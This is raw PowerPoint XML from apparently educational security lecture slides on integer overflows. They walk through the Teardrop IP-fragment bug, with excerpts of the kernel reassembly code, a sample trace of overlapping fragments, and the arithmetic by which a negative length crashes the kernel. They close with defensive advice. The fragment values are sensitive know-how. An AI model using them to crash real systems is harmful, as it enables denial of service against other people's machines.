                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  count += </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-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </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 = </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-&gt;next;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>How is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>computed?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="492239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8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8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dirty="0" smtClean="0"/>
              <a:t>Integer Overflows: Teardrop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140291" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Computes the positioning of the fragment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>end = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;offset + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ntohs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a: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iph</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>tot_len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>) – </a:t>
            </a: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ihl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>If there are overlapping fragments, realigns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>if (</a:t>
            </a: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prev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> != NULL &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;offset &lt; </a:t>
            </a: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prev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;end) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>overlap = </a:t>
            </a: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prev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;end – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;offset; /* size of the overlap */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	offset += overlap; /* increment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> into datagram */</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:b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ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> += overlap; /* increment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> into fragment data */ }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Initializes the fragment data structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;offset = offset;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;end = end;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:b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len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = end - offset;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>If the fragment is smaller than the size of the overlap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>offset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>will be bigger than</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>will be negative!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1746658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02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0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dirty="0" smtClean="0"/>
              <a:t>Integer Overflows: Teardrop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142339" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>222.222.222.222 &gt; 128.111.48.50: (frag 242:40@0+)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>222.222.222.222 &gt; 128.111.48.50: (frag 242:8@24)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>offset = 24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>end = 24 + 28 - 20 = 32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>prev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;end = 40 &gt; offset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>overlap = 40 - 24 = 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>offset = offset + overlap = 40</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = end - offset = 32 - 40 = -8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>will be interpreted as an unsigned value (65528)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Too many bytes will be copied and the kernel will crash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1141678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2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23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23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23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2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Integer of different sizes/types should be assigned with great attention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Integer overflows can make a large signed integer become a large negative value or a large unsigned integer become a small positive value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use assertions and similar checks to avoid overflows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="432030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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Loop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1107971" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Loop overflows happen when the attacker can control the loop iterations and checks are missing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A special case: off-by-one loop overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>These </a:t>
